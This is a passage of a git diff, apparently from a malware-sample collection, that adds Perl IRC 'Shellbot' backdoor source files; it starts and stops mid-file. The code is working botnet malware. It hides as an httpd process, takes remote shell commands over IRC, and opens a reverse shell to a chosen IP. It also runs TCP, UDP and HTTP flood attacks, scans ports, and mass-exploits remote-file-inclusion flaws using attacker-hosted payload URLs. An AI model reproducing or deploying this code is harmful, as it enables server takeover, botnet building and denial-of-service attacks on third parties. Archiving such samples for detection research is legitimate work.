"$1\.$2"."$r_duv"; + } + if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) { + $p_duv = $3; $p_duv++ if $4 >= 5; + $porcen = "$1\.$2"."$p_duv"; + } + return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen"); + } + + + return(0); +} + + +# esse "sub fixaddr" daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor) +sub fixaddr { + my ($address) = @_; + + chomp $address; # just in case, sigh. + if ($address =~ /^\d+$/) { + return inet_ntoa(pack "N", $address); + } elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) { + return $address; + } elsif ($address =~ tr/a-zA-Z//) { # Whee! Obfuscation! + return inet_ntoa(((gethostbyname($address))[4])[0]); + } else { + return; + } + +} diff --git a/Perl/Backdoor.Perl.Shellbot.aa b/Perl/Backdoor.Perl.Shellbot.aa new file mode 100644 index 00000000..475f2562 --- /dev/null +++ b/Perl/Backdoor.Perl.Shellbot.aa @@ -0,0 +1,611 @@ +# VulnScan v7 -Final- By Morgan +# +# Note: +# DO NOT REMOVE COPYRIGHTS ... +# +# |_|0|_| +# |_|_|0| +# |0|0|0| +# +# New functions : +# Anti-Clone l33t +# Fixed Print on Infected Boxes +# Easy Configuration +# l33t Color +# BackConnect function (Usage: botname @back IP port) +# +# +# Scan command : +# !morgan !eval @gstring='google%20dork'; +# !morgan @rfiscan vulnfile.php?vulnvar= +# +# DDoS commands : +# Udp : !morgan @udpflood IP packet-size time +# Tcp : !morgan @tcpflood IP port time +# Http: !morgan @httpflood www.website.com time +# +# Greets to : +# +# All #Morgan users... +# +# +# Enjoy the bot .... +# /Morgan + +use HTTP::Request; +use LWP::UserAgent; + +################ V7 CONFIGURATION ############################################################# +my $processo = 'httpd -DSL -DSL2'; # Fake process name for the bot # +if (`ps uxw` =~ /httpd -DSL -DSL2/) # (CHANGE IT!!!) # +{ # # +exit; # # +} # # +############################################################################################### +my $linas_max='8'; # Avoid Flood # +############################################################################################### +my $sleep='5'; # sleep time # +##################### IRC ##################################################################### +my @adms=("FabioMatador","dann123"); +my @hostauth=("imbanaco2.att.net.co"); # Administrator Nickname # +############################################################################################### +my @canais=("#timao.eu"); # Channel ..if password -> ("#channel :pass") # +############################################################################################### +my $nick='efut'; # Nick prefix of the bot example : # + # vs[v7] = vs[v7]-718727 # +############################################################################################### +my $ircname = 'Dt Script'; # Identd of the bot # +############################################################################################### +chop (my $realname = `uname -a`); # Full Name # +############################################################################################### +$servidor='stockholm.se.quakenet.org' unless $servidor; # Server IRC of the bot # +############################################################################################### +my $porta='6667'; # Server PORT # +################ CMD ########################################################################## +my @cmdgif='http://fabiocpv.by.ru/aa.txt'; # If you change this cmd must be same as:# + # http://myspace.si/images/sad.gif # +############################################################################################### + +my $VERSAO = 'v7'; +$SIG{'INT'} = 'IGNORE'; +$SIG{'HUP'} = 'IGNORE'; +$SIG{'TERM'} = 'IGNORE'; +$SIG{'CHLD'} = 'IGNORE'; +$SIG{'PS'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir("/"); +$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Problema com o fork: $!" unless defined($pid); + + +our %irc_servers; +our %DCC; +my $dcc_sel = new IO::Select->new(); + +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my $socket = $_[0]; + print $socket "$_[1]\n"; + } else { + print $IRC_cur_socket "$_[0]\n"; + } +} +# MORGAN OWNED YOUR BOX +# +# morgan.rx@gmail.com +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sleep 1; + } +} +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + delete($irc_servers{''}) if (defined($irc_servers{''})); + my @ready = $sel_cliente->can_read(0); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + + for(my $c=0; $c<= $#lines; $c++) { + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=''; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001"); + } + if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) { + if (grep {$_ =~ /^\Q$pn\E$/i } @adms) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } + if ($args =~ /^(\Q$meunick\E|\!eft)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } + } +} +} + elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { + if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + } + } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { + nick("$meunick|".int rand(999999)); + } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { + $meunick = $2; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; + foreach my $canal (@canais) { + sendraw("JOIN $canal ddosit"); + } + } +} + +# MORGAN OWNED YOUR BOX +# www.morganxpl.com +# morgan.rx@gmail.com +sub bfunc { + my $printl = $_[0]; + my $funcarg = $_[1]; + if (my $pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + if ($funcarg =~ /^portscan (.*)/) { + my $hostip="$1"; + my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); + my (@aberta, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[SCAN]\003\002 Scanning ".$1." for open ports."); + foreach my $porta (@portas) { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4); + if ($scansock) { + push (@aberta, $porta); + $scansock->close; + } + } + + if (@aberta) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[SCAN]\003\002 Open port(s): @aberta"); + } else { + sendraw($IRC_cur_socket,"PRIVMSG $printl :\002\0034[SCAN]\003\002 No open ports found"); + } + } + if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[TCP DDoSing]\003\002 Attacking ".$1.":".$2." for ".$3." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($3>$cur_time){ + $cur_time = time - $itime; + &tcpflooder("$1","$2","$3"); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[TCP DDoSing]\003\002 Attack done ".$1.":".$2."."); + } + if ($funcarg =~ /^version/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[VERSION]\003\002 w0rmb0t ver ".$VERSAO); +} + +if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { +my $host = "$1"; +my $porta = "$2"; +my $proto = getprotobyname('tcp'); +my $iaddr = inet_aton($host); +my $paddr = sockaddr_in($porta, $iaddr); +my $shell = "/bin/sh -i"; +if ($^O eq "MSWin32") { +$shell = "cmd.exe"; +} +socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; +connect(SOCKET, $paddr) or die "connect: $!"; +open(STDIN, ">&SOCKET"); +open(STDOUT, ">&SOCKET"); +open(STDERR, ">&SOCKET"); +system("$shell"); +close(STDIN); +close(STDOUT); +close(STDERR); + +if ($estatisticas) +{ +sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[BackConnect]\003\002: Connecting to $host:$porta"); +} +} +#SCANNER + if ($funcarg =~ /^rfiscan\s+(\d+)\s+(.*)/) { + $boturl=$2; + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034Scan\003\002 ╗ Scanning for Remote file inclusion using \002 ".$boturl." \002 for \002 ".$1." seconds."); + srand; + my $itime = time; + my ($cur_time); + my ($exploited); + $boturl=$2; + $cur_time = time - $itime;$exploited = 0; +while($1>$cur_time){ + $cur_time = time - $itime; + @urls=fetch(); +foreach $url (@urls) { +$cur_time = time - $itime; + #sendraw($IRC_cur_socket, "PRIVMSG #debug :\002\0034[x|Exploiting]\003\002 ".$url2."\n\n"); +my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/; +$url2 ="http://".$path."/".$boturl."@cmdgif?"; +print "\n".$url2."\n\n"; + + +# MORGAN OWNED YOUR BOX +# www.morganxpl.com +# morgan.rx@gmail.com + +my $req=HTTP::Request->new(GET=>$url2); +my $ua=LWP::UserAgent->new(); +$ua->timeout(10); +my $response=$ua->request($req); + +if ($response->is_success) { + if( $response->content =~ /By/ && $response->content =~ /Morgan/ ){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[Vulnerable]\003\002 ".$url2."\n\n"); +} +} +else { +} + } +} + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[Finished]\003\002 Scan finished in ".$1." seconds."); + } + if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[HTTP DDoSing]\003\002 Attacking ".$1.":80 for ".$2." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($2>$cur_time){ + $cur_time = time - $itime; + my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); + print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; + close($socket); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[HTTP]\003\002 Attacking done ".$1."."); + } + if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\0034[UDP DDoSing]\003\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds."); + my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); + $dtime = 1 if $dtime == 0; + my %bytes; + $bytes{igmp} = $2 * $pacotes{igmp}; + $bytes{icmp} = $2 * $pacotes{icmp}; + $bytes{o} = $2 * $pacotes{o}; + $bytes{udp} = $2 * $pacotes{udp}; + $bytes{tcp} = $2 * $pacotes{tcp}; + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP-DDOS]\002 Mщdia ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." Kb in ".$dtime." seconds to ".$1."."); + } + exit; + } + } +} +# MORGAN OWNED YOUR BOX +# www.morganxpl.com +# morgan.rx@gmail.com +sub ircase { + my ($kem, $printl, $case) = @_; + + if ($case =~ /^join (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } + if ($case =~ /^rejoin\s+(.*)/) { + my $chan = $1; + if ($chan =~ /^(\d+) (.*)/) { + for (my $ca = 1; $ca <= $1; $ca++ ) { + p("$2"); + j("$2"); + } + } else { + p("$chan"); + j("$chan"); + } + } + if ($case =~ /^op/) { + op("$printl", "$kem") if $case eq "op"; + my $oarg = substr($case, 3); + op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + if ($case =~ /^deop/) { + deop("$printl", "$kem") if $case eq "deop"; + my $oarg = substr($case, 5); + deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + if ($case =~ /^msg\s+(\S+) (.*)/) { + msg("$1", "$2"); + } + if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + msg("$2", "$3"); + } + } + if ($case =~ /^ctcp\s+(\S+) (.*)/) { + ctcp("$1", "$2"); + } + if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + ctcp("$2", "$3"); + } + } + if ($case =~ /^nick (.*)/) { + nick("$1"); + } + if ($case =~ /^connect\s+(\S+)\s+(\S+)/) { + conectar("$2", "$1", 6667); + } + if ($case =~ /^raw (.*)/) { + sendraw("$1"); + } + if ($case =~ /^eval (.*)/) { + eval "$1"; + } +} +# MORGAN OWNED YOUR BOX +# www.morganxpl.com +# morgan.rx@gmail.com +sub shell { + my $printl=$_[0]; + my $comando=$_[1]; + if ($comando =~ /cd (.*)/) { + chdir("$1") || msg("$printl", "No such file or directory"); + return; + } + elsif ($pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + my @resp=`$comando 2>&1 3>&1`; + my $c=0; + foreach my $linha (@resp) { + $c++; + chop $linha; + sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha"); + if ($c == "$linas_max") { + $c=0; + sleep $sleep; + } + } + exit; + } + } +} +# MORGAN OWNED YOUR BOX +# www.morganxpl.com +# morgan.rx@gmail.com +sub tcpflooder { + my $itime = time; + my ($cur_time); + my ($ia,$pa,$proto,$j,$l,$t); + $ia=inet_aton($_[0]); + $pa=sockaddr_in($_[1],$ia); + $ftime=$_[2]; + $proto=getprotobyname('tcp'); + $j=0;$l=0; + $cur_time = time - $itime; + while ($l<1000){ + $cur_time = time - $itime; + last if $cur_time >= $ftime; + $t="SOCK$l"; + socket($t,PF_INET,SOCK_STREAM,$proto); + connect($t,$pa)||$j--; + $j++;$l++; + } + $l=0; + while ($l<1000){ + $cur_time = time - $itime; + last if $cur_time >= $ftime; + $t="SOCK$l"; + shutdown($t,2); + $l++; + } +} +# MORGAN OWNED YOUR BOX +# www.morganxpl.com +# morgan.rx@gmail.com +sub udpflooder { + my $iaddr = inet_aton($_[0]); + my $msg = 'A' x $_[1]; + my $ftime = $_[2]; + my $cp = 0; + my (%pacotes); + $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0; + + socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++; + + socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++; + socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++; + socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++; + return(undef) if $cp == 4; + my $itime = time; + my ($cur_time); + while ( 1 ) { + for (my $porta = 1; $porta <= 65000; $porta++) { + $cur_time = time - $itime; + last if $cur_time >= $ftime; + send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++; + send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++; + send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++; + send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++; + + for (my $pc = 3; $pc <= 255;$pc++) { + next if $pc == 6; + $cur_time = time - $itime; + last if $cur_time >= $ftime; + socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next; + send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++; + } + } + last if $cur_time >= $ftime; + } + return($cur_time, %pacotes); +} + +sub ctcp { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :\001$_[1]\001"); +} +sub msg { + return unless $#_ == 1; + sendraw("PRIVMSG $_[0] :$_[1]"); +} +sub notice { + return unless $#_ == 1; + sendraw("NOTICE $_[0] :$_[1]"); +} +sub op { + return unless $#_ == 1; + sendraw("MODE $_[0] +o $_[1]"); +} +sub deop { + return unless $#_ == 1; + sendraw("MODE $_[0] -o $_[1]"); +} +sub j { &join(@_); } +sub join { + return unless $#_ == 0; + sendraw("JOIN $_[0]"); +} +sub p { part(@_); } +sub part { + sendraw("PART $_[0]"); +} +sub nick { + return unless $#_ == 0; + sendraw("NICK $_[0]"); +} +sub quit { + sendraw("QUIT :$_[0]"); +} + +# MORGAN OWNED YOUR BOX +# www.morganxpl.com +# morgan.rx@gmail.com + +sub fetch(){ + my $rnd=(int(rand(9999))); + my $n= 80; + if ($rnd<5000) { $n<<=1;} + my $s= (int(rand(10)) * $n); +{ +my @dominios = ("removed-them-all"); +my @str; + +foreach $dom (@dominios) +{ + push (@str,"@gstring"); +} + + my $query="www.google.com/search?q="; + $query.=$str[(rand(scalar(@str)))]; + $query.="&num=$n&start=$s"; + my @lst=(); +#sendraw("privmsg #Morgan :DEBUG only test googling: ".$query.""); + my $page = http_query($query); + while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){ +if ($1 !~ m/google|cache|translate/){ + push (@lst,$1); +} + } + return (@lst); +} + +sub http_query($){ + my ($url) = @_; + my $host=$url; + my $query=$url; + my $page=""; + $host =~ s/href=\"?http:\/\///; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $query =~s/$host//; + if ($query eq "") {$query="/";}; + eval { +local $SIG{ALRM} = sub { die "1";}; +alarm 10; +my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return; +print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; +my @r = <$sock>; +$page="@r"; +alarm 0; +close($sock); + }; + + return $page; +} +} +# MORGAN OWNED YOUR BOX +# www.morganxpl.com +# morgan.rx@gmail.com + +# NOTE: DONT REMOVE COPYRIGHTS \ No newline at end of file diff --git a/Perl/Backdoor.Perl.Shellbot.ah b/Perl/Backdoor.Perl.Shellbot.ah new file mode 100644 index 00000000..60089c16 --- /dev/null +++ b/Perl/Backdoor.Perl.Shellbot.ah @@ -0,0 +1,568 @@ +# SHELLBOT WITH VULNSCAN +# by destructive +# GREETINGZ: +# NOBODY, BECAUSE NOBODY HELPED US +# +# +# +# VISIT US ~ +# IRC Network: irc.GigaChat.net +# IRC Channel: #Atk33 +# +# +# +# +# pwn3d' + +my $processo = 'httpd'; +use HTTP::Request; +use LWP::UserAgent; + +#CONFIGURATION +my $linas_max='4'; +my $sleep='5'; +my @cmdstring='http://raidenzin.freehostia.com/list.txt?'; +my @adms=("Raiden","Morientes"); +my @canais=("#Own"); +my $nick='negrinhos'; +my $ircname ='negrinhos'; + +chop (my $realname = `id`); +$servidor='211.220.193.249' unless $servidor; +my $porta='1999'; +my $VERSAO = 'Shellbot RFI by destructive v1.0'; +$SIG{'INT'} = 'IGNORE'; +$SIG{'HUP'} = 'IGNORE'; +$SIG{'TERM'} = 'IGNORE'; +$SIG{'CHLD'} = 'IGNORE'; +$SIG{'PS'} = 'IGNORE'; +use IO::Socket; +use Socket; +use IO::Select; +chdir("/"); +$servidor="$ARGV[0]" if $ARGV[0]; +$0="$processo"."\0"x16;; +my $pid=fork; +exit if $pid; +die "Problema com o fork: $!" unless defined($pid); + + +our %irc_servers; +our %DCC; +my $dcc_sel = new IO::Select->new(); + +$sel_cliente = IO::Select->new(); +sub sendraw { + if ($#_ == '1') { + my $socket = $_[0]; + print $socket "$_[1]\n"; + } else { + print $IRC_cur_socket "$_[0]\n"; + } +} + +sub conectar { + my $meunick = $_[0]; + my $servidor_con = $_[1]; + my $porta_con = $_[2]; + + my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1); + if (defined($IRC_socket)) { + $IRC_cur_socket = $IRC_socket; + + $IRC_socket->autoflush(1); + $sel_cliente->add($IRC_socket); + + $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con"; + $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con"; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost; + nick("$meunick"); + sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname"); + sleep 1; + } +} +my $line_temp; +while( 1 ) { + while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); } + delete($irc_servers{''}) if (defined($irc_servers{''})); + my @ready = $sel_cliente->can_read(0); + next unless(@ready); + foreach $fh (@ready) { + $IRC_cur_socket = $fh; + $meunick = $irc_servers{$IRC_cur_socket}{'nick'}; + $nread = sysread($fh, $msg, 4096); + if ($nread == 0) { + $sel_cliente->remove($fh); + $fh->close; + delete($irc_servers{$fh}); + } + @lines = split (/\n/, $msg); + + for(my $c=0; $c<= $#lines; $c++) { + $line = $lines[$c]; + $line=$line_temp.$line if ($line_temp); + $line_temp=''; + $line =~ s/\r$//; + unless ($c == $#lines) { + parse("$line"); + } else { + if ($#lines == 0) { + parse("$line"); + } elsif ($lines[$c] =~ /\r$/) { + parse("$line"); + } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { + parse("$line"); + } else { + $line_temp = $line; + } + } + } + } +} + +sub parse { + my $servarg = shift; + if ($servarg =~ /^PING \:(.*)/) { + sendraw("PONG :$1"); + } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { + my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5; + if ($args =~ /^\001VERSION\001$/) { + notice("$pn", "\001VERSION mIRC v6.17 Khaled Mardam-Bey\001"); + } + if (grep {$_ =~ /^\Q$pn\E$/i } @adms) { + if ($onde eq "$meunick"){ + shell("$pn", "$args"); + } + if ($args =~ /^(\Q$meunick\E|\!crew)\s+(.*)/ ) { + my $natrix = $1; + my $arg = $2; + if ($arg =~ /^\!(.*)/) { + ircase("$pn","$onde","$1") unless ($natrix eq "!crew" and $arg =~ /^\!nick/); + } elsif ($arg =~ /^\@(.*)/) { + $ondep = $onde; + $ondep = $pn if $onde eq $meunick; + bfunc("$ondep","$1"); + } else { + shell("$onde", "$arg"); + } + } + + } +} + elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { + if (lc($1) eq lc($meunick)) { + $meunick=$4; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + } + } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { + nick("$meunick|".int rand(999999)); + } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { + $meunick = $2; + $irc_servers{$IRC_cur_socket}{'nick'} = $meunick; + $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; + foreach my $canal (@canais) { + sendraw("JOIN $canal ddosit"); + } + } +} + + +sub bfunc { + my $printl = $_[0]; + my $funcarg = $_[1]; + if (my $pid = fork) { + waitpid($pid, 0); + } else { + if (fork) { + exit; + } else { + if ($funcarg =~ /^portscan (.*)/) { + my $hostip="$1"; + my + +@portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","66 + +69","7000","8080","8018"); + my (@aberta, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports."); + foreach my $porta (@portas) { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4); + if ($scansock) { + push (@aberta, $porta); + $scansock->close; + } + } + + if (@aberta) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta"); + } else { + sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found"); + } + } + if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($3>$cur_time){ + $cur_time = time - $itime; + &tcpflooder("$1","$2","$3"); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2."."); + } + if ($funcarg =~ /^version/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 w0rmb0t ver ".$VERSAO); +} +#SCANNER + if ($funcarg =~ /^scan\s+(\d+)\s+(.*)\s+(.*)/) { + @gstring = $3; + $boturl=$2; + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Atk33]\002 Scan started. CMD: \002 @cmdstring \002 "); + srand; + my $itime = time; + my ($cur_time); + my ($exploited); + $boturl=$2; + $cur_time = time - $itime;$exploited = 0; +while($1>$cur_time){ + $cur_time = time - $itime; + @urls=fetch(); +foreach $url (@urls) { +$cur_time = time - $itime; + #sendraw($IRC_cur_socket, "PRIVMSG #debug :\002[Exploiting]\002 ".$url2."\n\n"); +my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/; +$url2 ="http://".$path."/".$boturl."@cmdstring?"; + +print "\n".$url2."\n\n"; + + + +my $req=HTTP::Request->new(GET=>$url2); +my $ua=LWP::UserAgent->new(); +$ua->timeout(10); +my $response=$ua->request($req); + +if ($response->is_success) { + if( $response->content =~ /By/ && $response->content =~ /destructive/ ){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Results]\002 ".$url2."\n\n"); +} +} +else { + print 'Errore: ',$path,$response->status_line, "\n"; +} + } +} + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[Finished]\002 Scan finished in ".$1." seconds."); + } + if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($2>$cur_time){ + $cur_time = time - $itime; + my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80); + print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n"; + close($socket); + } + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1."."); + } + if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." + +seconds."); + my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3"); + $dtime = 1 if $dtime == 0; + my %bytes; + $bytes{igmp} = $2 * $pacotes{igmp}; + $bytes{icmp} = $2 * $pacotes{icmp}; + $bytes{o} = $2 * $pacotes{o}; + $bytes{udp} = $2 * $pacotes{udp}; + $bytes{tcp} = $2 * $pacotes{tcp}; + sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + + +$bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1."."); + } + exit; + } + } +} + +sub ircase { + my ($kem, $printl, $case) = @_; + + if ($case =~ /^join (.*)/) { + j("$1"); + } + if ($case =~ /^part (.*)/) { + p("$1"); + } + if ($case =~ /^rejoin\s+(.*)/) { + my $chan = $1; + if ($chan =~ /^(\d+) (.*)/) { + for (my $ca = 1; $ca <= $1; $ca++ ) { + p("$2"); + j("$2"); + } + } else { + p("$chan"); + j("$chan"); + } + } + if ($case =~ /^op/) { + op("$printl", "$kem") if $case eq "op"; + my $oarg = substr($case, 3); + op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + if ($case =~ /^deop/) { + deop("$printl", "$kem") if $case eq "deop"; + my $oarg = substr($case, 5); + deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/); + } + if ($case =~ /^msg\s+(\S+) (.*)/) { + msg("$1", "$2"); + } + if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + msg("$2", "$3"); + } + } + if ($case =~ /^ctcp\s+(\S+) (.*)/) { + ctcp("$1", "$2"); + } + if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) { + for (my $cf = 1; $cf <= $1; $cf++) { + ctcp("$2", "$3"); + } + } + if ($case =~ /^nick (.*)/) { + nick("$1"); + } + if 